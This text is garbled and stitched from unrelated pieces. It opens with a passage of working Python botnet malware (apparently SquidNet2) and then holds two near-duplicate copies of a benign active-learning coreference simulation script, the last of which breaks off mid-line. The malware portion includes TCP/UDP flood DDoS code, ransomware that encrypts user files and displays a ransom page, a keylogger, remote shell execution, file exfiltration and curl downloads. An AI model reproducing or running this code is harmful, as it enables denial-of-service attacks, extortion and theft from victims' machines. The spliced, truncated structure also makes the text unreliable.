s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port)) s.close() except: pass def TCP_req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.ip, self.port)) s.send(self.gen_packet(self.pkt_size)) s.close() except: pass def Stop_Atk(self): self.stop = True def TCP_Flood(self): while True: try: tcp_req = threading.Thread(target=self.TCP_req) tcp_req.start() if self.stop: break time.sleep(self.delay) except: pass def UDP_Flood(self): while True: try: udp_req = threading.Thread(target=self.UDP_Req) udp_req.start() if self.stop: break time.sleep(self.delay) except: pass class RansomWare: def __init__(self, key): self.key = key self.fernet = Fernet(self.key) self.dirlist = [] self.filelist = [] self.keyfile = "key.txt" self.recovery_directory = "" if sys.platform == "win32": os.chdir("C:/Users/") self.recovery_directory = f"C:/Users/{os.getlogin()}/" else: self.recovery_directory = "/" os.chdir("/") def get_dir_list(self): for i in os.listdir(): try: file = open(i, "rb") file.close() self.filelist.append(os.path.join(os.getcwd(),i)) except: self.dirlist.append(os.path.join(os.getcwd(), i)) def encrypt_file(self, file): try: with open(file, "rb") as og_file: content = self.fernet.encrypt(og_file.read()) og_file.close() with open(file, "wb") as enc_file: enc_file.write(content) enc_file.close() except: pass def encrypt(self): self.get_dir_list() for i in self.dirlist: try: os.chdir(i) self.get_dir_list() except: pass for i in self.filelist: file_thread = threading.Thread(target=self.encrypt_file, args=(i,)) file_thread.start() self.ransom() self.checker = threading.Thread(target=self.check_key_file) self.checker.start() def decrypt(self): for i in self.filelist: try: with open(i,"rb") as enc_file: content = self.fernet.decrypt(enc_file.read()) enc_file.close() with open(i,"wb") as new_file: new_file.write(content) new_file.close() except: pass def download_emotional_support(self): cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) _cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) def recovering_html_code(self): return f''' <!DOCTYPE html> <head></head> <title>You're in Luck | Your files are being decrypted!</title> <body bgcolor='red'> <h1>Lucky you!</h1> <h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2> <h2>Please wait a moment, as the decrypted files are being decrypted at this moment. <h4>You can say your goodbyes to Barbara!</h4> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def ransom_html_code(self): return f''' <!DOCTYPE html> <head></head> <body bgcolor='red'> <title>Oops! | You've been Compromised!</title> <h1>Oops!</h1> <h2>Looks like your files have been encrypted.</h2> <h3>There is hope.</h3><br> A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br> Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br> How you will get your key? Well, that's all up to the BotMaster. <h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def check_key_file(self): while True: try: file = open(f"{self.recovery_directory}{self.keyfile}","rb") content = file.read() if bytes(content.strip()) == self.key: self.decryptor = threading.Thread(target=self.decrypt) self.decryptor.start() self.ransom(True) break time.sleep(1) except: pass def ransom(self, recovering=False): os.chdir(self.recovery_directory) if not recovering: keyfile = open(self.keyfile,"w") keyfile.close() self.download_emotional_support() filename = "Oops.html" else: filename = "Yay.html" bot.make_selffiles_encrypted_false() file = open(f"{self.recovery_directory}{filename}","w") if recovering: file.write(self.recovering_html_code()) else: file.write(self.ransom_html_code()) file.close() if sys.platform == "win32": os.startfile(file.name) else: os.system(f"open {file.name}") class Bot: def __init__(self, ip, port, enc_key): self.ip = ip self.port = port self.sendingfile = False self.enc_key = enc_key self.can_encrypt = False self.files_encrypted = False self.sql_connected = False self.keylogging = False self.keylogthreadstarted = False try: self.fernet = Fernet(self.enc_key) self.can_encrypt = True except: pass self.writefile = None self.writing_mode = False def get_ip(self): try: return urllib.request.urlopen(urllib.request.Request(url="https://httpbin.org/ip")).read().decode().strip().split('"')[3] except: try: return socket.gethostbyname(socket.gethostname()) except: return "127.0.0.1" def get_info(self): return f"!botreg {socket.gethostname()} {self.get_ip()} {os.getlogin()} {sys.platform}".encode() def connect(self): while True: try: self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.client.connect((self.ip, self.port)) banner = self.client.recv(1024).decode() time.sleep(5) break except: self.client.close() try: self.client.send(self.get_info()) except: pass reciever = threading.Thread(target=self.recv).start() self.pkt_sender = threading.Thread(target=self.check_still_connected).start() def initiate_connection(self): connect = threading.Thread(target=self.connect).start() def get_filename(self, msg): msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def make_selffiles_encrypted_false(self): self.files_encrypted = False def check_still_connected(self): while True: try: self.client.send("".encode()) time.sleep(10) except: while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def recv(self): while True: try: msg = self.client.recv(10240).decode() if not self.sendingfile: while True: try: handle_msg = threading.Thread(target=self.send, args=(msg,)).start() break except RuntimeError: pass except Exception as e: self.client.close() while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def exec_sql_cmd(self, sqlfile, cmd): sql = sqlite3.connect(sqlfile) cursor = sql.cursor() cursor.execute(cmd) output = str(cursor.fetchall()) sql.commit() cursor.close() sql.close() return output def on_press(self, key): if self.keylogging: self.client.send(f"!key {key}".encode()) def on_release(self, key): pass def start_keylog(self): try: with Listener(on_press=self.on_press, on_release=self.on_release) as L: L.join() except: pass def return_actual_dir(self, direc): return direc.replace("%user%",os.getlogin()) def send(self, msg): msg = str(msg) if not self.writing_mode and not self.sql_connected: try: if msg.startswith("!open"): filename = self.get_filename(msg) if sys.platform == "win32": os.startfile(filename) else: os.system(f"open {filename}") elif msg.startswith("!keylog"): if not self.keylogging: if not self.keylogthreadstarted: keylogger = threading.Thread(target=self.start_keylog) keylogger.start() self.keylogging = True self.keylogthreadstarted = True elif msg.startswith("!stopkeylog"): self.keylogging = False elif msg.startswith('!httpflood'): msg = msg.split() ip = msg[1] delay = float(msg[2]) self.dos = DDoS(ip, delay) elif msg.startswith("!sqlconnect"): try: self.sql_connected = True self.sql_file = self.get_filename(msg) file = open(self.sql_file,"rb") file.close() item = self.exec_sql_cmd(self.sql_file, "select sql from sqlite_master") self.client.send(f"Successfully connected to the Database file: {self.sql_file}".encode()) except Exception as e: self.client.send(f"There was an error connecting to file '{self.sql_file}': {e}".encode()) self.sql_connected = False elif msg.startswith("!stopatk"): try: self.dos.stop_atk() except: pass try: self.tcpflood.Stop_Atk() except: pass try: self.udpflood.Stop_Atk() except: pass elif msg.startswith("!tcpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood) self.tcp_flood.start() elif msg.startswith("!udpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood) self.udp_flood.start() elif msg.startswith("!getcwd"): cwd = os.getcwd() self.client.send(f"Current working directory: {os.getcwd()}".encode()) elif msg.startswith("!changedir"): newdir = self.return_actual_dir(self.get_filename(msg)) os.chdir(newdir) elif msg.startswith("!viewfilecontent"): file = msg.split()[1] self.client.send(open(file, "rb").read()) elif msg.startswith("!listdir"): self.client.send(f"Files in dir {os.getcwd()}: {os.listdir()}".encode()) elif msg.startswith("!mkdir"): dir = self.get_filename(msg) os.mkdir(dir) elif msg.startswith("!ransomware"): if not self.files_encrypted: self.ransomware = RansomWare(self.enc_key) self.ransomware.encrypt() self.files_encrypted = True elif msg.startswith("!createfile"): file = self.get_filename(msg) if file in os.listdir(): file += f"{random.randint(0,123456789)}" fileopened = open(file, "w") fileopened.close() elif msg.startswith("!delfile"): file = self.get_filename(msg) os.remove(file) self.client.send(f"File {file} has been deleted.".encode()) elif msg.startswith("!delfolder"): folder = self.get_filename(msg) shutil.rmtree(folder) self.client.send(f"Folder {folder} has been deleted.".encode()) elif msg.startswith("!writefile"): file = self.get_filename(msg) self.writefile = open(file, "rb") content = self.writefile.read() self.writefile.close() self.writefile = self.writefile.name self.writing_mode = True elif msg.startswith("!encfile"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") content = self.fernet.encrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been encrypted.".encode()) else: self.client.send("Cannot encrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!decrypt"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") try: content = self.fernet.decrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been decrypted.".encode()) except Exception as e: self.client.send(f"There was en error with decrypting file {file}.".encode()) else: self.client.send("Cannot decrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!filedownload"): try: file = self.get_filename(msg) file = open(file, "rb") self.sendingfile = True while True: sendto = file.read(10240) if not sendto: time.sleep(3) self.client.send("!stopsave".encode()) self.sendingfile = False break else: self.client.send(sendto) time.sleep(1) self.client.send("File transfer to server completed.".encode()) except: self.client.send("File was not found in the bot directory.".encode()) time.sleep(3) self.client.send("!stopsave".encode()) elif msg.startswith("!download"): try: link = msg.split()[1] file = msg.split()[2] cmd = subprocess.Popen(f"curl -o {file} {link}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(f"File {file} has been downloaded from {link}.".encode()) except: self.client.send(f"There was an error with downloading the file.".encode()) else: cmd = subprocess.Popen(msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(cmd.stdout.read()) self.client.send(cmd.stderr.read()) except Exception as e: pass elif self.writing_mode: write_msg = f"\\n{msg}".encode() if msg == "!stopwrite": self.writing_mode = False else: file = open(self.writefile, "rb") content = file.read() file.close() file = open(self.writefile,"wb") file.write(content) file.write(write_msg) elif self.sql_connected: if msg.startswith("!stopsql"): self.sql_connected = False self.client.send("Disconnecting from the Sqlite3 Database file.".encode()) else: try: output = self.exec_sql_cmd(self.sql_file, msg) self.client.send(output.encode()) except Exception as e: self.client.send(f"There was an error in the Database file: {e}".encode()) bot = Bot('"""+self.external_ip+"""',"""+str(self.external_port)+""", """+str(self.enc_key)+""") bot.initiate_connection() """ return payload class AutoUpdate: def __init__(self): self.version = 4.0 def check_update(self): print(BotNet.logo(None)) print("[+] Checking for updates.....") version = self.version - 1.0 updated = False try: req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/SquidNet2Version.json") recv = urllib.request.urlopen(req).read().decode() version_info = open("SquidNet2Version.json","w") version_info.write(recv) version_info.close() json_info = json.load(open(version_info.name,"r")) version = float(json_info[0]["SquidNet2"]) except: print("[+] There was an error with checking updates, starting SquidNet2.") if version > self.version: print(f"[+] Your Version of SquidNet2 is outdated. You have version {self.version}, whereas the current update is version v{version}.") update = input("\n[+] Do you wish to update?(y/n): ").lower() if update == "y" or update == "yes": print(f"[+] Updating SquidNet2 to v{version}") updated = True req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/MainScripts/SquidNet2.py") resp = urllib.request.urlopen(req).read() file = open(sys.argv[0],"wb") file.write(resp) file.close() else: print("[+] Choosing not to update.") if not updated: if sys.platform == "win32": os.system("cls") else: os.system("clear") Squidnet = Config(self.version) Squidnet.read_config() else: print("[+] Restart the Script to have the Update be effective!") class Config: """Class needed for using the config file.""" def __init__(self, version): self.version = version self.config_file = "server.config" def read_config(self): """The config file is read here, where the variables that are in the file are used for the main server.""" try: file = open(self.config_file,"r") content = file.readlines() for i in content: if i.startswith("\nhostip") or i.startswith("hostip"): hostip = i.replace("=","").split()[1] elif i.startswith("\nhostport") or i.startswith("hostport"): hostport = int(i.replace("=","").split()[1]) elif i.startswith("\nexternal_host") or i.startswith("external_host"): external_host = i.replace("=","").split()[1] elif i.startswith("\nexternal_port") or i.startswith("external_port"): external_port = int(i.replace("=","").split()[1]) elif i.startswith("\nlogfile") or i.startswith("logfile"): logfile = i.replace("=","").split()[1] elif i.startswith("\nadmin_name") or i.startswith("admin_name"): admin_name = i.replace("=","").split()[1] elif i.startswith("\nadmin_password") or i.startswith("admin_password"): admin_password = i.replace("=","").split()[1] elif i.startswith("\nenc_key") or i.startswith("enc_key"): enc_key = f"{i.replace('=','').split()[1]}=".encode() elif i.startswith("\nftp_dir") or i.startswith("ftp_dir"): ftp_dir = i.replace("=","").split()[1] elif i.startswith("\nransomware_active") or i.startswith("ransomware_active"): ransomware_active = i.replace("=","").split()[1] if ransomware_active.lower() == "f": ransomware_active = False else: ransomware_active = True Squidnet = BotNet(hostip, hostport, self.version, external_host, external_port, admin_name, admin_password, logfile, enc_key, ftp_dir, ransomware_active) Squidnet.start() except Exception as e: self.gen_config_file() def gen_config_file(self): """If there is an error in the usage of the config file, a new config file will be generated, and the user can simply restart the script to have a functional server.""" print(BotNet.logo(None)) print("[+] There is an error in the config file. Re-writing and re-formatting to be able to be used by the server.") gen_content = """ hostip = localhost hostport = 8080 external_host = localhost external_port = 8080 logfile = log.txt admin_name = admin admin_password = adminpassword12345 enc_key = iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8= ftp_dir = Bot_Files ransomware_active = f """ file = open(self.config_file,"w") file.write(gen_content) file.close() print("[+] The Config file has been reformatted and is now usable by the server! Restart the script to start the server.") item = AutoUpdate() item.check_update()
import argparse import torch import numpy as np import pathlib from train_active import finetune_on_queries from incremental import Incremental from inference import Predictor from score import Scorer import util import copy from collections import defaultdict import logging import json from eval_all import ALL def load_model(config, fp): model = Incremental(config) util.load_params(model, fp, "model") logging.info(f"Updating threshold to {config["threshold"]}") model.set_threshold(config["threshold"]) return model def update_queries(queries, span_scores, n, c, read_docs=None): """ Assumes [span_scores] is sorted in descending order according to score. Adds at most [n] entries from [span_scores] to [queries] with highest score. Avoids adding duplicate spans. While adding queries, constrain added spans from set of at most [c] documents by taking top-[c] spans and then constraining the rest of added spans to belong only in the same documents as those [c] spans. [read_docs] is set containing docs already read (for mixed-ent) """ if read_docs is None: read_docs = set() num_spans = n for span_score in span_scores: if n <= 0: # stop, already queried enough spans break doc_key = span_score['doc_key'] if span_score['span'] in queries.get(doc_key, []): # skip duplicate span continue else: if len(read_docs) < c: # add span to queries queries[doc_key].append(span_score['span']) n -= 1 # add to constrained docs read_docs.add(doc_key) else: if doc_key in read_docs: # only add span to queries if in constrained docs queries[doc_key].append(span_score['span']) n -= 1 logging.info(f'Added {num_spans-n} spans belonging to {len(read_docs)} docs') return read_docs def sample_spans(model, dataset, queries, config, scoring, cycle): """ Sample spans for active learning by scoring spans based on strategy and picking the top-scoring spans. Does not sample duplicate spans that are already queried. - [model]: acquisition model - [dataset]: data to sample from - [queries]: spans that are already queried before - [config]: simulation hyperparameters - [scoring]: active learning strategy - [cycle]: the cycle number """ scorer = Scorer(model, dataset) SCORING = { 'random-ment': scorer.random_ment, 'mention': scorer.mention_detection, 'cond-ent':scorer.conditional_entropy, 'random':scorer.random, 'ment-ent':scorer.mention_entropy, 'joint-ent':scorer.joint_entropy, 'clust-ent':scorer.cluster_entropy, 'li-clust-ent':scorer.li_entropy } with torch.no_grad(): span_scores = SCORING[scoring]( cycle=cycle, num_cycles=config['num_cycles'] ) # sort scores in descending order span_scores.sort(key = lambda k : k['score'], reverse=True) # add to [queries] update_queries(queries, span_scores, config['num_spans'], config['max_docs']) # return all spans with their scores return span_scores def extract_data(dataset, queries): """ From [dataset], extract antecedent annotations for [queries]. Returns (new_data, num_queries) where: - [new_data] is a subset of [dataset] which contains annotations only for spans in [queries] - [num_queries] is number of annotated spans in [new_data] """ stop = len(queries) new_data = [] num_queries = 0 # iterate over [dataset] with stopping condition for faster search for doc in dataset: if stop <= 0: # already queried labels for all sampled spans break doc_key = doc['doc_key'] if doc_key in queries: # at least one span in doc was queried gold_map = doc['antecedent_map'] # get most recent antecedent for queried spans sub_map = {} for span in queries.get(doc_key, []): if span in gold_map: ante = gold_map[span] if type(ante) is list: # grab most recent antecedent if not '0' cluster ante = [max(ante)] sub_map[span] = ante else: sub_map[span] = None num_queries += 1 if len(sub_map) > 0: # create new copy of doc with new sub_map new_doc = copy.copy(doc) new_doc['antecedent_map'] = sub_map new_data.append(new_doc) stop -= 1 return new_data, num_queries def load_queries(fp): num_queries = 0 if not fp.exists(): return defaultdict(list), num_queries with open(fp, 'r') as f: queries = json.load(f) # replaces tuples for doc_key, spans in queries.items(): tuple_spans = [] for span in spans: tuple_spans.append(tuple(span)) queries[doc_key] = tuple_spans num_queries += len(tuple_spans) # convert to defaultdict queries = defaultdict(list, queries) # return queries and # of queried spans return queries, num_queries def output_results(fp, config, cycle, scores): results = { 'seed': config['seed'], 'strategy': config['strategy'], 'cycle': cycle, 'num_spans': config['num_spans'], 'max_docs': config['max_docs'], } results.update(scores) with open(fp, 'w') as f: json.dump(results, f) return def create_cycle_dir(config, idx): # store results in {sim_dir} / {seed} / {strategy} / {num_spans}spans-{max_docs}docs / {cycle #} spans_docs = f'{config['num_spans']}spans-{config['max_docs']}docs' cycle_dir = config['sim_dir'] / str(config['seed']) / spans_docs / config['strategy'] / f'cycle{idx}' cycle_dir.mkdir(parents=True, exist_ok=True) change_log(cycle_dir / 'out.log') return cycle_dir def eval_scores(model, config, data_prefix, preds_file=None): """ Evaluate [model] on test or dev set based on [data_prefix]. Output F1 and mention detection accuracy. """ logging.info(f'Evaluating on {data_prefix}') data = util.load_data(config[f"{data_prefix}_path"]) evaluator = Predictor(model, data, config["singleton_eval"]) with torch.no_grad(): f1 = evaluator.evaluate() mentions = evaluator.evaluators[ALL].evaluators[3].get_f1() scores = {'f1': f1, 'mentions': mentions} if preds_file: evaluator.write_preds(preds_file) logging.info(f"Wrote preds to {preds_file}") return scores def simulation(config, data_train): """ Run active learning simulation by sampling data from unlabeled pool, using gold data to label sampled spans, and then finetuning model on labeled data. - [config]: contains all simulation hyperparameters - [data_train]: data pool to sample from """ # initialize acquisition model as source model logging.info(f'Loading acq. model from {config['src_path']}') acq_model = load_model(config, config['src_path']) src_path = config['src_path'] # no labeled instances queries = defaultdict(list) for i in range(config['start'], config['num_cycles'] + 1): logging.info(f'Cycle {i}') total_num_spans = i * config['num_spans'] cycle_dir = create_cycle_dir(config, i) model_file = cycle_dir / 'checkpoint.bin' queries_file = cycle_dir / 'queries.json' res_dev_file = cycle_dir / 'results_dev.json' res_test_file = cycle_dir / 'results_test.json' queries_found = False try: # check if queries for current cycle exist new_queries, num_queries = load_queries(queries_file) if num_queries < total_num_spans: raise ValueError(f'File does not contain enough queries') logging.info('Found queries already sampled for this cycle') logging.info(f'Loading queries from {queries_file}') queries = new_queries queries_found = True except ValueError: # else, sample new queries and concat with old queries logging.info(f'Sampling {config['num_spans']} new queries by {config['strategy']} for this cycle') strategy = config['strategy'] candidates = \ sample_spans(acq_model, data_train, queries, config, strategy, cycle=i) with open(queries_file, 'w') as f: json.dump(queries, f) # If model already exists and queries found, don't finetune new model if model_file.exists() and queries_found: logging.info('Finetuned model for cycle already exists') logging.info(f'Loading acq. model from {cycle_dir}') util.load_params(acq_model, model_file, "model") # evaluate model logging.info('Evaluating model') preds_file_dev = cycle_dir / 'preds_dev.json' scores_dev = eval_scores(acq_model, config, "dev", preds_file_dev) logging.info(f'Model has {scores_dev['f1']:.3f} dev F1') output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file_test = cycle_dir / 'preds_test.json' scores_test = eval_scores(acq_model, config, "test", preds_file_test) output_results(res_test_file, config, i, scores_test) continue #move on to next cycle # get subset of train data for queried spans data_query, num_queries = extract_data(data_train, queries) # finetune model on queries logging.info( f'Finetuning src model on {num_queries} queries from {len(data_query)} docs' ) scores_dev, model = finetune_on_queries(config, data_query, cycle_dir, src_path) output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file = cycle_dir / 'preds_test.json' scores_test = eval_scores(model, config, "test", preds_file) output_results(res_test_file, config, i, scores_test) logging.info(f'Saved model, queries, scores to {cycle_dir}') # set acquisition model to model finetuned on queries logging.info(f'Loading acq. model from {cycle_dir} for next cycle') util.load_params(acq_model, model_file, "model") # remove old model files if not config['save_ckpt']: logging.info(f'Removing {model_file}') model_file.unlink() def userstudy(config, data_train): """ Update the model based on feedback from user study. - [config]: hyperparameters for model fine-tuning - [data_train]: data pool to sample from """ def preprocess_data(doc, queries): """ Create a new field in [doc] called [antecedent_map] which processes the user-labeled [antecedents]. Add all labeled spans to [queries]. in queries). """ ante_map = {} for entry in doc['antecedents']: span = tuple(entry[0]) if entry[1] == -1: label = None elif entry[1] == 0: label = '0' else: label = [tuple(entry[1])] ante_map[span] = label doc['antecedent_map'] = ante_map del doc['antecedents'] # update queries to know what has been queried queries[doc['doc_key']] = list(ante_map.keys()) # return # spans labeled return len(ante_map) # preprocess antecedents and get queries data_fp = config['userstudy'] / 'train_data.jsonl' data = [] queries = defaultdict(list) num_queries = 0 with open(data_fp, 'r') as f: for line in f: doc = json.loads(line) # update doc and queries n = preprocess_data(doc, queries) num_queries += n data.append(doc) # finetune model on data src_path = config['src_path'] logging.info( f'Finetuning src model on {num_queries} queries from {len(data)} docs' ) scores_dev, model = finetune_on_queries(config, data, config['userstudy'], src_path) # test model results_fp = config['userstudy'] / 'results_test.json' scores_test = eval_scores(model, config, "test") output_results(results_fp, config, 1, scores_test) def write_config(c): config = copy.copy(c) config_path = config["sim_dir"] / "config.json" logging.info(f"Saved at {config_path}") config["device"] = str(config["device"]) config["sim_dir"] = str(config["sim_dir"]) config["src_path"] = str(config["src_path"]) with open(config_path, 'w+') as f: f.write(json.dumps(config, indent=4)) def change_log(logfile): log = logging.getLogger() for hdlr in log.handlers[:]: # remove the existing file handlers if isinstance(hdlr,logging.FileHandler): log.removeHandler(hdlr) filehandler = logging.FileHandler(logfile,'a') formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s") filehandler.setFormatter(formatter) log.addHandler(filehandler) if __name__ == "__main__": config = util.initialize_from_env(use_overrides=True) config['src_path'] = pathlib.Path('checkpoint.bin') config['sim_dir'] = pathlib.Path(config['simulation_dir']) / config['run_name'] util.set_seed(config) train_pool = util.load_data(config[f'train_path'], num_examples=config['num_train_examples']) if 'user' in config: config['userstudy'] = \ pathlib.Path(f'/exp/myuan/userstudy/day1/session{config['session']}') / config["user"] userstudy(config, train_pool) else: simulation(config, train_pool) write_config(config)
import argparse import torch import numpy as np import pathlib from train_active import finetune_on_queries from incremental import Incremental from inference import Predictor from score import Scorer import util import copy from collections import defaultdict import logging import json from eval_all import ALL def load_model(config, fp): model = Incremental(config) util.load_params(model, fp, "model") logging.info(f"Updating threshold to {config['threshold']}") model.set_threshold(config["threshold"]) return model def update_queries(queries, span_scores, n, c, read_docs=None): """ Assumes [span_scores] is sorted in descending order according to score. Adds at most [n] entries from [span_scores] to [queries] with highest score. Avoids adding duplicate spans. While adding queries, constrain added spans from set of at most [c] documents by taking top-[c] spans and then constraining the rest of added spans to belong only in the same documents as those [c] spans. [read_docs] is set containing docs already read (for mixed-ent) """ if read_docs is None: read_docs = set() num_spans = n for span_score in span_scores: if n <= 0: # stop, already queried enough spans break doc_key = span_score['doc_key'] if span_score['span'] in queries.get(doc_key, []): # skip duplicate span continue else: if len(read_docs) < c: # add span to queries queries[doc_key].append(span_score['span']) n -= 1 # add to constrained docs read_docs.add(doc_key) else: if doc_key in read_docs: # only add span to queries if in constrained docs queries[doc_key].append(span_score['span']) n -= 1 logging.info(f'Added {num_spans-n} spans belonging to {len(read_docs)} docs') return read_docs def sample_spans(model, dataset, queries, config, scoring, cycle): """ Sample spans for active learning by scoring spans based on strategy and picking the top-scoring spans. Does not sample duplicate spans that are already queried. - [model]: acquisition model - [dataset]: data to sample from - [queries]: spans that are already queried before - [config]: simulation hyperparameters - [scoring]: active learning strategy - [cycle]: the cycle number """ scorer = Scorer(model, dataset) SCORING = { 'random-ment': scorer.random_ment, 'mention': scorer.mention_detection, 'cond-ent':scorer.conditional_entropy, 'random':scorer.random, 'ment-ent':scorer.mention_entropy, 'joint-ent':scorer.joint_entropy, 'clust-ent':scorer.cluster_entropy, 'li-clust-ent':scorer.li_entropy } with torch.no_grad(): span_scores = SCORING[scoring]( cycle=cycle, num_cycles=config['num_cycles'] ) # sort scores in descending order span_scores.sort(key = lambda k : k['score'], reverse=True) # add to [queries] update_queries(queries, span_scores, config['num_spans'], config['max_docs']) # return all spans with their scores return span_scores def extract_data(dataset, queries): """ From [dataset], extract antecedent annotations for [queries]. Returns (new_data, num_queries) where: - [new_data] is a subset of [dataset] which contains annotations only for spans in [queries] - [num_queries] is number of annotated spans in [new_data] """ stop = len(queries) new_data = [] num_queries = 0 # iterate over [dataset] with stopping condition for faster search for doc in dataset: if stop <= 0: # already queried labels for all sampled spans break doc_key = doc['doc_key'] if doc_key in queries: # at least one span in doc was queried gold_map = doc['antecedent_map'] # get most recent antecedent for queried spans sub_map = {} for span in queries.get(doc_key, []): if span in gold_map: ante = gold_map[span] if type(ante) is list: # grab most recent antecedent if not '0' cluster ante = [max(ante)] sub_map[span] = ante else: sub_map[span] = None num_queries += 1 if len(sub_map) > 0: # create new copy of doc with new sub_map new_doc = copy.copy(doc) new_doc['antecedent_map'] = sub_map new_data.append(new_doc) stop -= 1 return new_data, num_queries def load_queries(fp): num_queries = 0 if not fp.exists(): return defaultdict(list), num_queries with open(fp, 'r') as f: queries = json.load(f) # replaces tuples for doc_key, spans in queries.items(): tuple_spans = [] for span in spans: tuple_spans.append(tuple(span)) queries[doc_key] = tuple_spans num_queries += len(tuple_spans) # convert to defaultdict queries = defaultdict(list, queries) # return queries and # of queried spans return queries, num_queries def output_results(fp, config, cycle, scores): results = { 'seed': config['seed'], 'strategy': config['strategy'], 'cycle': cycle, 'num_spans': config['num_spans'], 'max_docs': config['max_docs'], } results.update(scores) with open(fp, 'w') as f: json.dump(results, f) return def create_cycle_dir(config, idx): # store results in {sim_dir} / {seed} / {strategy} / {num_spans}spans-{max_docs}docs / {cycle #} spans_docs = f'{config["num_spans"]}spans-{config["max_docs"]}docs' cycle_dir = config['sim_dir'] / str(config['seed']) / spans_docs / config['strategy'] / f'cycle{idx}' cycle_dir.mkdir(parents=True, exist_ok=True) change_log(cycle_dir / 'out.log') return cycle_dir def eval_scores(model, config, data_prefix, preds_file=None): """ Evaluate [model] on test or dev set based on [data_prefix]. Output F1 and mention detection accuracy. """ logging.info(f'Evaluating on {data_prefix}') data = util.load_data(config[f"{data_prefix}_path"]) evaluator = Predictor(model, data, config["singleton_eval"]) with torch.no_grad(): f1 = evaluator.evaluate() mentions = evaluator.evaluators[ALL].evaluators[3].get_f1() scores = {'f1': f1, 'mentions': mentions} if preds_file: evaluator.write_preds(preds_file) logging.info(f"Wrote preds to {preds_file}") return scores def simulation(config, data_train): """ Run active learning simulation by sampling data from unlabeled pool, using gold data to label sampled spans, and then finetuning model on labeled data. - [config]: contains all simulation hyperparameters - [data_train]: data pool to sample from """ # initialize acquisition model as source model logging.info(f'Loading acq. model from {config["src_path"]}') acq_model = load_model(config, config['src_path']) src_path = config['src_path'] # no labeled instances queries = defaultdict(list) for i in range(config['start'], config['num_cycles'] + 1): logging.info(f'Cycle {i}') total_num_spans = i * config['num_spans'] cycle_dir = create_cycle_dir(config, i) model_file = cycle_dir / 'checkpoint.bin' queries_file = cycle_dir / 'queries.json' res_dev_file = cycle_dir / 'results_dev.json' res_test_file = cycle_dir / 'results_test.json' queries_found = False try: # check if queries for current cycle exist new_queries, num_queries = load_queries(queries_file) if num_queries < total_num_spans: raise ValueError(f'File does not contain enough queries') logging.info('Found queries already sampled for this cycle') logging.info(f'Loading queries from {queries_file}') queries = new_queries queries_found = True except ValueError: # else, sample new queries and concat with old queries logging.info(f'Sampling {config["num_spans"]} new queries by {config["strategy"]} for this cycle') strategy = config['strategy'] candidates = \ sample_spans(acq_model, data_train, queries, config, strategy, cycle=i) with open(queries_file, 'w') as f: json.dump(queries, f) # If model already exists and queries found, don't finetune new model if model_file.exists() and queries_found: logging.info('Finetuned model for cycle already exists') logging.info(f'Loading acq. model from {cycle_dir}') util.load_params(acq_model, model_file, "model") # evaluate model logging.info('Evaluating model') preds_file_dev = cycle_dir / 'preds_dev.json' scores_dev = eval_scores(acq_model, config, "dev", preds_file_dev) logging.info(f'Model has {scores_dev["f1"]:.3f} dev F1') output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file_test = cycle_dir / 'preds_test.json' scores_test = eval_scores(acq_model, config, "test", preds_file_test) output_results(res_test_file, config, i, scores_test) continue #move on to next cycle # get subset of train data for queried spans data_query, num_queries = extract_data(data_train, queries) # finetune model on queries logging.info( f'Finetuning src model on {num_queries} queries from {len(data_query)} docs' ) scores_dev, model = finetune_on_queries(config, data_query, cycle_dir, src_path) output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file = cycle_dir / 'preds_test.json' scores_test = eval_scores(model, config, "test", preds_file) output_results(res_test_file, config, i, scores_test) logging.info(f'Saved model, queries, scores to {cycle_dir}') # set acquisition model to model finetuned on queries logging.info(f'Loading acq. model from {cycle_dir} for next cycle') util.load_params(acq_model, model_file, "model") # remove old model files if not config['save_ckpt']: logging.info(f'Removing 